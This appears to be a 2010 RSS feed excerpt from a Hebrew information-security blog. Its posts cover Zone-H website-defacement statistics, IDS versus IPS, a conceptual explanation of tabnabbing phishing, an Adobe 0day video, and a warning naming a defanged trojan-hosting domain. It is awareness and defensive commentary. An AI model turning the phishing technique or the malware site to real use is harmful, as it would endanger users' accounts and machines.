		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1521</guid>
		<description><![CDATA[&#8235;הפעם אני מרוצה כי זה טרול תוצרת חוץ, טורקי (כנראה) שהחליט להשמיץ אותי ב-TWITTER..
Block and report SPAM..

אם מישהו יודע טורקית, מוזמן לתרגם..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftrol-turki&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הפעם אני מרוצה כי זה טרול תוצרת חוץ, טורקי (כנראה) שהחליט להשמיץ אותי ב-TWITTER..<br />
Block and report SPAM..<br />
<a href="http://guym.co.il/wp-content/uploads/2010/06/turkish.jpg"><img class="aligncenter size-full wp-image-1522" title="טרול טורקי" src="http://guym.co.il/wp-content/uploads/2010/06/turkish.jpg" alt="" width="320" height="480" /></a></p>
<p>אם מישהו יודע טורקית, מוזמן לתרגם..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftrol-turki&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%96%D7%9E%D7%9F+%D7%9C%D7%90+%D7%94%D7%99%D7%94+%D7%9C%D7%99+%D7%98%D7%A8%D7%95%D7%9C+http://bit.ly/bYVXRs" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/trol-turki/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;0Day חדש למוצרי אדובי&#8236;</title>		<link>http://guym.co.il/0day/?nucrss=1</link>
		<comments>http://guym.co.il/0day/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 03:42:18 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[0Day]]></category>
		<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1519</guid>
		<description><![CDATA[&#8235;כן, אני יודע ששמעתם על זה כבר, אבל ראיתם את ההדגמה הזו?

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F0day&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>כן, אני יודע ששמעתם על זה כבר, אבל ראיתם את ההדגמה הזו?<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="980" height="765" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/cIY0-3DyQvA&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1&amp;border=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="980" height="765" src="http://www.youtube.com/v/cIY0-3DyQvA&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1&amp;border=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F0day&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=0Day+%D7%97%D7%93%D7%A9+%D7%9C%D7%9E%D7%95%D7%A6%D7%A8%D7%99+%D7%90%D7%93%D7%95%D7%91%D7%99+http://bit.ly/bCv1E0" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/0day/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;איך פורצים לאתר אינטרנט?&#8236;</title>		<link>http://guym.co.il/hacking-web-site/?nucrss=1</link>
		<comments>http://guym.co.il/hacking-web-site/#comments</comments>
		<pubDate>Sun, 06 Jun 2010 08:55:23 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[פריצה לאתר]]></category>
		<category><![CDATA[פריצה למחשב]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1516</guid>
		<description><![CDATA[&#8235;פעם כתבתי פוסט קטן באותו שם שבו די חיפפתי את השאלה הזאת שנשאלתי כל כך הרבה פעמים (וגם ספגתי על זה המון ביקורת, אבל יש לי עור עבה שמוגן בהרבה ריפוד   ).
הסיבה לפוסט הזה הוא שהאתר Zone-H פירסם כמה סטטיסטיקות מעניינות.
למשל&#8230; מה יותר מאובטח, WINDOWS או LINUX? זו שאלת השאלות.
אם התשובה תיתבסס על [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhacking-web-site&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>פעם כתבתי פוסט קטן באותו שם שבו די חיפפתי את השאלה הזאת שנשאלתי כל כך הרבה פעמים (וגם ספגתי על זה המון ביקורת, אבל יש לי עור עבה שמוגן בהרבה ריפוד <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ).</p>
<p>הסיבה לפוסט הזה הוא שהאתר Zone-H פירסם כמה סטטיסטיקות מעניינות.</p>
<p>למשל&#8230; מה יותר מאובטח, WINDOWS או LINUX? זו שאלת השאלות.</p>
<p>אם התשובה תיתבסס על מה פורצים יותר, Windows מאובטח יותר (זה פופוליזם, אני יודע. האמת היא שיש הרבה יותר שרתי לינוקס באינטרנט ולכן ברור שייפרצו יותר כאלה) :</p>
<table border="1" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td>Year</td>
<td>Total deface­ments Linux (all dis­tros)</td>
<td>Total deface­ments Win­dows (all ver­sions)</td>
</tr>
<tr>
<td>2000</td>
<td>931</td>
<td>2.587</td>
</tr>
<tr>
<td>2001</td>
<td>4.080</td>
<td>13.549</td>
</tr>
<tr>
<td>2002</td>
<td>22.693</td>
<td>43.441</td>
</tr>
<tr>
<td>2003</td>
<td>191.720</td>
<td>58.571</td>
</tr>
<tr>
<td>2004</td>
<td>247.113</td>
<td>119.402</td>
</tr>
<tr>
<td>2005</td>
<td>276.294</td>
<td>179.945</td>
</tr>
<tr>
<td>2006</td>
<td>446.039</td>
<td>258.129</td>
</tr>
<tr>
<td>2007</td>
<td>305.968</td>
<td>139.427</td>
</tr>
<tr>
<td>2008</td>
<td>352.449</td>
<td>141.061</td>
</tr>
<tr>
<td>2009</td>
<td>378.728</td>
<td>143.151</td>
</tr>
<tr>
<td>2010</td>
<td>256.648</td>
<td>87.959</td>
</tr>
<tr>
<td>Total</td>
<td><strong>2.482,663</strong></td>
<td>1.187,222</td>
</tr>
</tbody>
</table>
<p>מה הסיבה לפריצות?</p>
<table border="1" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td>Attack Rea­son</td>
<td>Year 2008</td>
<td>Year 2009</td>
<td>Year 2010</td>
</tr>
<tr>
<td>I just want to be the  best defacer</td>
<td>201.270</td>
<td>122.442</td>
<td>78.761</td>
</tr>
<tr>
<td>Heh just for fun!</td>
<td>96.438</td>
<td>176.725</td>
<td>179.707</td>
</tr>
<tr>
<td>As a challenge</td>
<td>61.112</td>
<td>26.921</td>
<td>13.422</td>
</tr>
<tr>
<td>Polit­i­cal reasons</td>
<td>50.578</td>
<td>72.767</td>
<td>19.360</td>
</tr>
<tr>
<td>Patriotism</td>
<td>46.619</td>
<td>40.374</td>
<td>17.877</td>
</tr>
<tr>
<td>Revenge against that  website</td>
<td>4.802</td>
<td>23.513</td>
<td>15.147</td>
</tr>
<tr>
<td>Not avail­able</td>
<td>56.640</td>
<td>81.667</td>
<td>28.545</td>
</tr>
</tbody>
</table>
<p>הסיבות הנפוצות ביותר הן למטרות גאווה (תראו, אני גבר) ולמטרות כיף. שימו לב שהאקר מקצועי בתחום CyberCrime או בשירות הבטחון במדינות השונות לא יפרסם את הפריצות שלו לאתרים ולכן הסיבות האמיתיות (כסף או מודיעין) לא מופיעות פה.</p>
<p>איך פורצים אתר? (מה השיטות לפריצה של אתרים):</p>
<table style="height: 520px;" border="1" width="399" align="center" bordercolor="#c8c8c8">
<tbody>
<tr>
<td align="center">Attack Method</td>
<td>Total 2008</td>
<td>Total 2009</td>
<td>Total 2010</td>
</tr>
<tr>
<td>Attack against the  administrator/​user (pass­word stealing/​sniffing)</td>
<td>33.141</td>
<td>24.386</td>
<td>10.918</td>
</tr>
<tr>
<td>Shares  mis­con­fig­u­ra­tion</td>
<td>72.192</td>
<td>87.313</td>
<td>55.725</td>
</tr>
<tr>
<td>File Inclu­sion</td>
<td>90.801</td>
<td>95.405</td>
<td>115.574</td>
</tr>
<tr>
<td>SQL  Injec­tion</td>
<td>32.275</td>
<td>57.797</td>
<td>33.920</td>
</tr>
<tr>
<td>Access cre­den­tials  through Man In the Mid­dle attack</td>
<td>37.526</td>
<td>7.385</td>
<td>1.005</td>
</tr>
<tr>
<td>Other Web  Appli­ca­tion bug</td>
<td>36.832</td>
<td>99.546</td>
<td>42.874</td>
</tr>
<tr>
<td>FTP  Server intrusion</td>
<td>32.521</td>
<td>11.749</td>
<td>5.138</td>
</tr>
<tr>
<td>Web Server intrusion</td>
<td>8.334</td>
<td>9.820</td>
<td>7.400</td>
</tr>
<tr>
<td>DNS  attack through cache poisoning</td>
<td>7.541</td>
<td>3.289</td>
<td>1.361</td>
</tr>
<tr>
<td>Other Server  intrusion</td>
<td>5.655</td>
<td>10.799</td>
<td>5.123</td>
</tr>
<tr>
<td>DNS  attack through social engineering</td>
<td>6.310</td>
<td>2.847</td>
<td>1.358</td>
</tr>
<tr>
<td>URL  Poi­son­ing</td>
<td>5.970</td>
<td>6.294</td>
<td>3.516</td>
</tr>
<tr>
<td>Web Server exter­nal  mod­ule intrusion</td>
<td>4.967</td>
<td>2.265</td>
<td>1.313</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through bruteforcing</td>
<td>9.991</td>
<td>6.862</td>
<td>7.046</td>
</tr>
<tr>
<td>Rerout­ing after  attack­ing the Firewall</td>
<td>8.143</td>
<td>3.107</td>
<td>1.267</td>
</tr>
<tr>
<td>SSH  Server intrusion</td>
<td>6.231</td>
<td>4.624</td>
<td>4.550</td>
</tr>
<tr>
<td>RPC  Server intrusion</td>
<td>12.359</td>
<td>5.821</td>
<td>2.512</td>
</tr>
<tr>
<td>Rerout­ing after  attack­ing the Router</td>
<td>9.170</td>
<td>2.671</td>
<td>1.327</td>
</tr>
<tr>
<td>Remote ser­vice  pass­word guessing</td>
<td>6.641</td>
<td>3.252</td>
<td>1.103</td>
</tr>
<tr>
<td>Tel­net Server  intrusion</td>
<td>4.050</td>
<td>3.476</td>
<td>2.562</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through pass­word guessing</td>
<td>4.915</td>
<td>1.139</td>
<td>422</td>
</tr>
<tr>
<td>Remote  admin­is­tra­tive panel access through social engineering</td>
<td>4.431</td>
<td>1.502</td>
<td>472</td>
</tr>
<tr>
<td>Remote ser­vice  pass­word bruteforce</td>
<td>5.563</td>
<td>3.658</td>
<td>1.002</td>
</tr>
<tr>
<td>Mail Server intrusion</td>
<td>1.441</td>
<td>2.314</td>
<td>1.121</td>
</tr>
<tr>
<td>Not avail­able</td>
<td>70.457</td>
<td>87.684</td>
<td>24.493</td>
</tr>
</tbody>
</table>
<p>מעניין. יש התאמה חלקית עם הניתוח של OWASP לגבי הפגיעויות הנפוצות ביותר אבל לא התאמה מלאה.</p>
<p>ברור שחלק מהנושאים פחות מדברים אל גוף כמו OWASP שעוסק ב-WEB APPLICATIONS אבל המסר העיקרי בהבדל הזה בין הניתוחים הוא שצריך לראות את התמונה השלמה. זה גם מחזק את העובדה שניתוח סיכונים חשוב הרבה יותר מביצוע Pentest בלבד.</p>
<p>האמת היא שיש עוד כמה נושאים שאפשר להסיק מהסטטיסטיקה הזאת, אבל אני אשמור אותם לעצמי כרגע.</p>
<p>היה מאוד מעניין לקרוא את זה.</p>
<p>המקור פה:</p>
<p><a href="http://www.zone-h.org/news/id/4735" target="_blank">http://www.zone-h.org/news/id/4735</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhacking-web-site&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%A4%D7%95%D7%A8%D7%A6%D7%99%D7%9D+%D7%9C%D7%90%D7%AA%D7%A8+%D7%90%D7%99%D7%A0%D7%98%D7%A8%D7%A0%D7%98%3F+http://bit.ly/be4pEn" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/hacking-web-site/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;ניב מחפש עבודה &#8211; אתם יכולים לעזור&#8236;</title>		<link>http://guym.co.il/niv-new-job/?nucrss=1</link>
		<comments>http://guym.co.il/niv-new-job/#comments</comments>
		<pubDate>Sat, 05 Jun 2010 12:27:38 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1514</guid>
		<description><![CDATA[&#8235;חבר טוב שלי, ניב דוד, מחפש עבודה.
ניב הוא מקצוען אמיתי ואנו מכירים כבר הרבה שנים.
אני מאוד מעריך אותו, לדעתי הוא נכס אמיתי לארגון שצריך אנשים מקצוענים שגם חושבים.
ניב מחפש תפקיד מאתגר בתחומי ניהול טכנולוגי, אסטרטגיה טכנולוגית, ניהול לקוחות ופרוייקטים גלובליים מורכבים, אבטחת מידע, ניהול סיכונים, המשכיות עסקית ויעוץ רב-תחומי.
לניב יש נסיון ביעוץ ובניהול תהליכים ופרוייקטים מורכבים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fniv-new-job&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר טוב שלי, ניב דוד, מחפש עבודה.</p>
<p>ניב הוא מקצוען אמיתי ואנו מכירים כבר הרבה שנים.</p>
<p>אני מאוד מעריך אותו, לדעתי הוא נכס אמיתי לארגון שצריך אנשים מקצוענים שגם חושבים.</p>
<p>ניב מחפש תפקיד מאתגר בתחומי ניהול טכנולוגי, אסטרטגיה טכנולוגית, ניהול לקוחות ופרוייקטים גלובליים מורכבים, אבטחת מידע, ניהול סיכונים, המשכיות עסקית ויעוץ רב-תחומי.</p>
<p>לניב יש נסיון ביעוץ ובניהול תהליכים ופרוייקטים מורכבים בחברות גלובליות, הדורשים שילוביות של תפיסה מערכתית, מוכוונות עסקית ופתרונות יישומיים, טכנולוגיים ואחרים. בעל הכרות נרחבת ונסיון עם טכנולוגיות מגוונות, אבטחת מידע (כולל ניהול סיכונים, המשכיות עסקית, תשתיות, מתודולוגיה, תקנים ורגולציה), פרוייקטים ארגוניים תפעוליים ועוד.</p>
<p>אם מישהו חושב על משרה, אשמח אם תיצרו עימי קשר ואעביר לו את המידע.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fniv-new-job&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%A0%D7%99%D7%91+%D7%9E%D7%97%D7%A4%D7%A9+%D7%A2%D7%91%D7%95%D7%93%D7%94+%E2%80%93+%D7%90%D7%AA%D7%9D+%D7%99%D7%9B%D7%95%D7%9C%D7%99%D7%9D+%D7%9C%D7%A2%D7%96%D7%95%D7%A8+http://bit.ly/ccQgYi" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/niv-new-job/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;IDS או IPS?&#8236;</title>		<link>http://guym.co.il/ids-o-ips/?nucrss=1</link>
		<comments>http://guym.co.il/ids-o-ips/#comments</comments>
		<pubDate>Fri, 04 Jun 2010 07:40:22 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1509</guid>
		<description><![CDATA[&#8235;בשיעור שלימדתי אתמול בקורס CISO בטכניון הנושא היה Intrusion Detection and Response.
במהלך השיעור יש הסבר על נושאים רבים ומגוונים אך מה שרציתי לספר הוא העניין הבא:
לעיתים קרובות במהלך יעוץ שאני נותן בחברות שונות אני נתקל ברכיבי IPS מותקנים באזורים ברשת. (IPS הם ראשי תיבות של Intrusion Prevention System &#8211; מערכת למניעת פריצה רכיב דומה הוא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fids-o-ips&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בשיעור שלימדתי אתמול בקורס CISO בטכניון הנושא היה Intrusion Detection and Response.</p>
<p>במהלך השיעור יש הסבר על נושאים רבים ומגוונים אך מה שרציתי לספר הוא העניין הבא:</p>
<p>לעיתים קרובות במהלך יעוץ שאני נותן בחברות שונות אני נתקל ברכיבי IPS מותקנים באזורים ברשת. (IPS הם ראשי תיבות של Intrusion Prevention System &#8211; מערכת למניעת פריצה רכיב דומה הוא IDS &#8211; ראשי תיבות של  &#8211; Intrusion Detection System וזו כמובן מערכת לזיהוי פריצה).</p>
<p>כשאנחנו מנתחים את הצורך הראשוני ברכיב אני מגלה שהדרישה היא &quot;לדעת&quot; בלבד, ללא צורך בתגובה אקטיבית מעבר להתרעה במידה שיש חשש לחדירה.</p>
<p>כשנשאלת השאלה מדוע בחרו ברכיב אקטיבי (IPS) ולא ב-IDS, אך אחד לא ממש יודע לענות. זה מה שהמליצה חברת היעוץ ואף אחד לא חשב אם זה באמת הרכיב הנכון.</p>
<p>אז מה הבעיה עם זה?</p>
<p>רכיבי IDS ו-IPS אמור להשקיף על הפקטות העוברות ברשת. הם מעבדים כל פקטה שהם רואים ומחליטים אם היא בעייתית או לא.</p>
<p>הם יכולים לבצע את ההחלטות לגבי פקטה בעייתית בצורות שונות אבל זה בד&quot;כ בצורה של זיהוי חתימות או זיהוי אנומליות.</p>
<p>IDS ו-IPS הם רכיבים דומים שמגיבים בצורה שונה בעת גילוי פקטה בעייתית. השוני המהותי בין הרכיבים הוא איך הם מטפלים באירוע בו הם מגלים פקטה בעייתית.</p>
<p>IDS פשוט מתעד ומתריע על בעייה (זה יכול להיות ב-LOG או בצורות אחרות).</p>
<p>IPS הוא רכיב אקטיבי יותר ואם הוא מחליט שהפקטה בעייתית, IPS יכול (בנוסף לתיעוד והתרעה) להחזיר תגובה כגון הודעת RESET שתנתק את התקשורת עם התוקף שייצר את הפקטה הבעייתית.</p>
<p>אז למה לא תמיד לשים IPS?</p>
<p>הבעיה ברכיב IPS היא שהוא אקטיבי. קל מאוד להבין שהוא יושב ומשקיף על התעבורה.</p>
<p>לתוקף שמבין שיש IPS ברשת יש כמה אפשרויות, בינהן שתיים מאוד בעייתיות:</p>
<p>1.לבחון שיטות שבהן הוא יוכל &quot;לחמוק&quot; מהרכיב ברשת הביתית שלו ורק אז לבצע את ההתקפה ברשת היעד.</p>
<p>2. בהנחה ויש לו 0Day לרכיב &#8211; הוא יכול לנטרל את ה-IPS או לקבל אליו גישה כזו או אחרת שתעזור לו לבטל את הדיווח והתגובה על ההתקפה שהו מתכנן.</p>
<p>לעומת IPS, רכיב IDS ישב בצורה שקופה ויתעד את הבעיות כשברוב המקרים התוקף לא יבין שה-IDS  מתעד את מעשיו או שרכיב כזה קיים בכלל ברשת.</p>
<p>אז נשאלת השאלה אם IDS הוא חף מהבעיות האלה, למה להשתמש בכלל ב-IPS?</p>
<p>כיוון שלעיתים רבות אנו זקוקים לרכיב הגנה אקטיבי שיכול להגיב באופן אוטומטי ללא התערבות לאיומים מוכרים ו-IPS עונה בדיוק על ההגדרה הזו.</p>
<p>אשמח לדעת מה היא השקפת העולם שלכם בנוגע לרכיבים האלה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fids-o-ips&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=IDS+%D7%90%D7%95+IPS%3F+http://bit.ly/czKyKd" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/ids-o-ips/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>&#8235;מה זה Tabnabbing?&#8236;</title>		<link>http://guym.co.il/tabnabbing/?nucrss=1</link>
		<comments>http://guym.co.il/tabnabbing/#comments</comments>
		<pubDate>Sun, 30 May 2010 13:35:17 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[WEB]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1505</guid>
		<description><![CDATA[&#8235;זו התקפה חדשה ומגניבה.
הרעיון הוא להוסיף סקריפט לאתר שימתין לזמן בו החלון אינו בפוקוס ועברתם ל-TAB אחר בדפדפן.
כאשר עברתם ל-TAB אחר האתר טוען עצמו מחדש לתוכן שונה &#8211; נניח תוכן שייראה כמו GMAIL, בנק וכ&#34;ו.
יחד עם זה תוחלף הכותרת של הטאב, אם יש FAVICON יוחלף גם הוא.
כשתרצו להכנס ל-GMAIL שלכם אתם (בתקווה) תטעו ותכנסו ל-TAB [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftabnabbing&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>זו התקפה חדשה ומגניבה.</p>
<p>הרעיון הוא להוסיף סקריפט לאתר שימתין לזמן בו החלון אינו בפוקוס ועברתם ל-TAB אחר בדפדפן.</p>
<p>כאשר עברתם ל-TAB אחר האתר טוען עצמו מחדש לתוכן שונה &#8211; נניח תוכן שייראה כמו GMAIL, בנק וכ&quot;ו.</p>
<p>יחד עם זה תוחלף הכותרת של הטאב, אם יש FAVICON יוחלף גם הוא.</p>
<p>כשתרצו להכנס ל-GMAIL שלכם אתם (בתקווה) תטעו ותכנסו ל-TAB הסורר וכך יצליחו לבצע עליכם פישינג מתקדם ומגניב.</p>
<p>סרטון שמראה את ההתקפה:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="267" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=12003099&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="267" src="http://vimeo.com/moogaloop.swf?clip_id=12003099&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><a href="http://vimeo.com/12003099">A New Type of Phishing Attack</a> from <a href="http://vimeo.com/user532161">Aza Raskin</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<p>הגעתי לזה דרך <a href="http://cyblog.info" target="_blank">דודו</a>. תודה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>עריכה:</p>
<p>אביב ראף עשה משהו יותר מפחיד. אותו דבר בלי JS. לא ייאמן.: <a href="http://avivraff.com/research/phish/article.php" target="_blank">http://avivraff.com/research/phish/article.php</a></p>
<p>כל כך רציני ש-NO SCRIPT עודכן להתמודד עם זה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftabnabbing&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%94+%D7%96%D7%94+Tabnabbing%3F+http://bit.ly/bovpor" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/tabnabbing/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;מעניין.. עוד התקפה שמשתמשת ב-TWITTER.&#8236;</title>		<link>http://guym.co.il/twitter/?nucrss=1</link>
		<comments>http://guym.co.il/twitter/#comments</comments>
		<pubDate>Thu, 20 May 2010 13:00:06 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[MALWARE]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1498</guid>
		<description><![CDATA[&#8235;אם אתם רואים ב-TWITTER את המשפט הזה &#34;haha this is the funniest video ive ever seen&#34; נא לא ללחוץ על הלינק.
הוא מוביל לאתר hXXp://pc-tv.tv שבו תוכלו להידבק בסוסון חביב שעוד לא הספקתי לוודא מה הוא עושה.
זהירות..

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftwitter&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אם אתם רואים ב-TWITTER את המשפט הזה &quot;haha this is the funniest video ive ever seen&quot; נא לא ללחוץ על הלינק.</p>
<p>הוא מוביל לאתר hXXp://pc-tv.tv שבו תוכלו להידבק בסוסון חביב שעוד לא הספקתי לוודא מה הוא עושה.</p>
<p>זהירות..</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/112.png"><img class="aligncenter size-full wp-image-1501" title="ה-JAVASCRIPT שמנסה להדביק." src="http://guym.co.il/wp-content/uploads/2010/05/112.png" alt="ה-JAVASCRIPT שמנסה להדביק." width="531" height="137" /></a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Ftwitter&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%A2%D7%A0%D7%99%D7%99%D7%9F..+%D7%A2%D7%95%D7%93+%D7%94%D7%AA%D7%A7%D7%A4%D7%94+%D7%A9%D7%9E%D7%A9%D7%AA%D7%9E%D7%A9%D7%AA+%D7%91-TWITTER.+http://bit.ly/cQ8w6F" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/twitter/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;אבטחה של אתר ראשות המיסים&#8236;</title>		<link>http://guym.co.il/maam-site-password/?nucrss=1</link>
		<comments>http://guym.co.il/maam-site-password/#comments</comments>
		<pubDate>Thu, 20 May 2010 08:04:45 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1480</guid>
